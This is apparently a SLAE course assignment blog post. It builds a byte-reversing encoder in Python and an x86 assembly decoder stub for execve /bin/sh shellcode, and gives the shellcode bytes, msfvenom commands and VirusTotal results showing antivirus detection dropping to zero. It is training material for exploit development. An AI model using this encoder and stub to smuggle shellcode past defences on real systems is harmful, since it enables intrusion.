SLAE Assignment 4: Custom Encoder Scheme

The 4rd assignment of the SLAE certification focuses on creating a custom encoding schema and requires the following:

  • Create a custom encoding scheme similar to the “Insertion Encoder” example demonstrated in the course
  • Write a proof of concept using the execve-stack as the shellcode to encode with your custom schema.

Encoder Overview

In the SLAE lecture about encoders Vivek demonstrates how an insertion encoder works.

Insertion Encoding and decoding

The insertion encoder obfuscates the assembly machine instructions in the shellcode by adding a chosen character or characters into the original instructions. By inserting the characters the signature of the original shellcode is changed making it less likely to be detected by IPS/IDS or anti-malware software which use signature based detection. As the shellcode has been encoded a decoder stub is used to recover the original instructions.

Custom Encoder

My solution to the assignment is to encode the original shellcode by reversing the instructions i.e. the first becomes the last and the last becomes the first. The custom encoder will be written using python 3.

Custom Encoder: Input

The encoder’s input is the machine language instructions from the shellcode which will be encoded. As in the previous assignments the instructions are extracted using the objdump command:

objdump -s ./ | grep -v '^ [0-9a-f][0-9a-f][0-9a-f][0-9a-f] \b' | grep -v 'Contents' | grep -v '^./' | cut -d' ' -f 3-6| sed 's/ //g' | sed '/./!d' | tr -d '\n'| sed 's/.\{2\}/&\\x/g' | sed 's/^/\\x/'|sed 's/..$//'|sed 's/^/"/;s/$/"/g'

Custom Encoder: Output

The encoder’s output is the reversed machine code instructions with  each instruction printed using the format for an individual assembly Byte variable for example where ‘db’ stands for ‘define Byte’.

reversed_code db 0x80

Multiple Bytes can be declared by adding a ‘,’ between the Bytes. The example below declares 5 Bytes.

reversed_code db 0x80,0xcd,0x0b,0xb0,0xe1

The encoded machine instructions will be inserted into the decoder shellcode. The output for the custom encoder must use this format as the encoded shellcode machine code instructions will stored as Byte sized variable within the decoder shellcode stub.

Custom Encoder script

The encoder script is relatively straight forward and has been commented throughout. The script performs the following steps:

  • Check for the required number of arguments
  • Split the shellcode command line parameter string into a list using ‘\x’ as the separator.
    • It then deletes the first item in the list as it contains junk characters
  • Loops through the ‘reversed’ list adding the required characters to convert the instructions into assembly variables which can be used in the decoder.

The encoding script is as follows:

from sys import argv
import sys
#--------------------------------------------------------------------------------
# Initial Processing of Command-Line Arguments
#--------------------------------------------------------------------------------
if len(sys.argv) != 2:
    print("Usage: \"\" Note: The double quotes are required")
    exit()
# Store Command Line Arguments
path, shellcode = argv

#--------------------------------------------------------------------------------
# Remove '\x' from the shellcode string
#--------------------------------------------------------------------------------
shellcode = (shellcode.split("\\x", len(shellcode)))
del shellcode[0]

# Declare required variables
encoded = ""
encoded2 = ""

#--------------------------------------------------------------------------------
# Loop through the string and add the required characters for the
# Encoded assembly string variables
#--------------------------------------------------------------------------------

for x in reversed(shellcode):
    # Concatonate '0x' to the string
    encoded2 += '0x'
    # Concatonate the the current character to the string
    encoded2 += x
    # Concatonate ',' to the string
    encoded2 += ','

#--------------------------------------------------------------------------------
# Final correction of encoded instructions strings
#--------------------------------------------------------------------------------

# Remove the trailing ',' from the string
encoded2 = encoded2[0:-1] 
print('\n')
# Print the encoded instructions string
print(encoded2)
exit()

Custom Encoder Usage

The script is run using the command below:

python3 reverse-encode.py

Encoded shellcode Instructions

The encoder is now up and running, so lets use it to encode the machine code instructions for the execve-stack shellcode. The execve machine instructions are as follows:

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

Running the python encoder gives the following encoded output:

0x80,0xcd,0x0b,0xb0,0xe1,0x89,0x53,0xe2,0x89,0x50,0xe3,0x89,0x6e,0x69,0x62,0x2f,0x68,0x68,0x73,0x2f,0x2f,0x68,0x50,0xc0,0x31

The encoded instructions are now ready to be used in the decoder.

Custom Decoder Stub

Decoding Process

When the decoder stub is executed it ‘reverse decodes’ the shellcode instructions so they can be executed in the correct order.

I tested a number of approaches to reversing instructions as they are copied onto the stack. The approach I chose was to copy the reversed shellccode variable from its 1st Byte to its last Byte on to the stack using movsb .

The movsb instruction works in the following way:

  • Copies a single Byte from the memory address located in the ESI register to the memory address located in the EDI register.
  • Automatically increments the memory address of the ESI and EDI registers so that the next Byte can be copied

Incrementing the source register, ESI, works as the reversed_code variable will be iterated from it’s 1st to last Byte. However, when the destination register is incremented the stack reference will be lower on the stack, i.e. a higher memory address and the current data stored on the stack will be overwritten. It is possible to reverse the direction in which movsb copies which results in the source and destination being decremented after each move instruction. However this results in the same problem but with the reversed_code variable pointer moving in the wrong direction.

My solution to this problem is to ‘dec’ the destination register twice after each movsb instruction. Therefore moving the EDI register up the stack or to the next lower Byte in memory. When all the entire reversed shellcode variable has been copied the destination register EDI will not be pointing at 1-Byte lower than the shellcode instructions. Therefore all that has to be done to execute the shellcode is to increment the EDI register and then call it.

The diagram below shows the reversed_code variable and the decoded shellcode on the stack.

variable-and-stack-memory

Decoder Stub Overview

The custom decoder stub has been written using assembly. It performs the following steps:

1. Get the memory address of the encoded shellcode

  • Use jmp-call-pop to get the memory address of the encoded shellcode variable

2. Calculates the length of the encoded shellcode

  • Use jmp-call-pop to get the memory address of the NOP instruction after the instruction after the shellcode variable
  • Subtract the length of the call instruction
  • Calculate shellcode length
  • Calculate the end location for the shellcode
  • Get current ESP value
  • Subtract 80 Bytes from the ESP value to ensure the shellcode doesn’t overwrite the current stack

3. ‘Reverse’ Decode the shellcode

  • Copy a Byte from the encoded_shellcode variable onto the stack
  • Adjust the destination register, subtract two bytes
  • Decrement the counter variable
  • Test to see if the entire shellcode has been ‘decoded’/copied
    • If not loop again
    • Once the copying is complete adjust the EDI register so that it points to the first decoded shellcode instruction on the stack
  • Increment then jump to the EDI register

Reverse Decode Stub Instructions

global _start
_start:
    jmp short encoded_shellcode ; Initiate JMP-call-pop
decode:
    pop esi                     ; Save the memory address of the reversed_code 
                                ; string used by movsb
    jmp short shellcode_length  ; Initiate JMP-call-pop

; Setup for decoding the shellcode
decode_length:
    pop ecx         ; Store the location of the nop instruction 
                    ; after 'decode_length'
    sub ecx, 0x4    ; Subtract the size of the 'call decode_length' instruction 
                    ; minus '1' to get the end of the encoded shellcode
    sub ecx, esi    ; Calculate and store the length of the encoded shellcode 
                    ; in ECX to be used as the Loop counter
    mov edi, esp    ; Set the destination for movsb. 
    sub edi, 0x50   ; Move the end of the shellcode further away from the 
                    ; top of the stack to add padding space

loop:
    movsb           ; Copy ESI to EDI
    dec edi         ; Decrement the counter twice as required due to 
                    ; the string being reversed
    dec edi         ; 
    sub ecx, 0x1    ; Decrement the loop counter variable
    cmp ecx, 0x1    ; Test to see if the entire string has been copied 
                    ; to the stack
    jne loop        ; Jump when not equal to 0x1
    inc edi         ; Move the EDI register to point at the first Byte 
                    ; of the shellcode, the loop moves the EDI register 
                    ; to point at the next location for the instructions
                    ; to be copied leaving EDI at 1 Byte lower than the shellcode
    jmp edi         ; Jump to EDI to execute the decoded shellcode

encoded_shellcode:
 call decode
    reversed_code db    0x41; reverse-encode.py output set here. 

shellcode_length:
    call decode_length  ; jmp-CALL-pop
    nop                 ; NOP instruction used to calculate the length 
                        ; of the shellcode which must be decoded

Setting up the Decoder

The decoder is complete and the output from the reverse-encode.py script can be added to the reverse-decode.nasm file and assembled using the following

#!/bin/bash
echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm
echo '[+] Linking ...'
ld -z execstack -o $1 $1.o
echo '[+] Done!'

Testing the custom decoder

Once the custom decoder is compiled it can be tested by simply running the shellcode. In the screenshot:

  • The decoder is executed and it creates a new shell.
  • The ls command is run which displays the contents of the folder /home/user01
  • cd .. moves the current directory up one level
  • ls is displays the contents of the /home
  • The shell is exited and the original terminal continues to run

testing

Does the encoding work

I guess the reason for encoding the shellcode is to see if it can evade anti-virus software or IDS/IPS systems. So for the final part of this assignment I’m going to:

  • Generate the execve shellcode using Metasploit’s msfvenom
  • Encode the payload instructions
  • Compile the reverse-decode shellcode
  • Upload it to virus total to see if it is detected.

Find msfvenom payload and required options.

Use the following command to get the list of msfvenom payloads.

msfvenom -l payloads | grep linux/x86

The one we want is the ‘linux/x86/exec‘. Now the options are listed using:

msfvenom -a x86 --platform linux -p linux/x86/exec --payload-options

I just need to set the program which will be executed. /bin/sh and set it to output machine instructions.

msfvenom -a x86 --platform linux -p linux/x86/exec CMD=/bin/sh -f c -o msfvenom_exec.txt

Finally I put the instructions into a C source file, compile and test the shellcode works. As can be seen it works OK, but it must contain NULL Bytes as the length of the shellcode is only 15 Bytes.

slae_a4_msfvenom_shellcode

The shellcode is uploaded to virus total to see what the detection rate is like, we find that 4/54 anti-virus engines detect the shellcode as malicious.

slae_a4_virus_total_msfvenom_execve

Now, I’ll encode the instructions and compile into the reverse decode shellcode. The detection rate at virustotal has been significantly reduced to 0/53. What’s interesting is that one of the engines wasn’t able to scan the file, which was in essence the same as the previous shellcode which had 54 anti-virus engines successfully scan the file.

slae_a4_virus_total_encoded_execve

Source Code

The source code for the shellcode, reverse-encode.py and reverse-decode.nasm ‘source code can be found in the following Git Hub repository

https://github.com/raidersofthelostarg/slae/tree/master/assignment-4

SLAE Student Details

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-793

Advertisements
This entry was posted in SLAE and tagged , , . Bookmark the permalink.

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s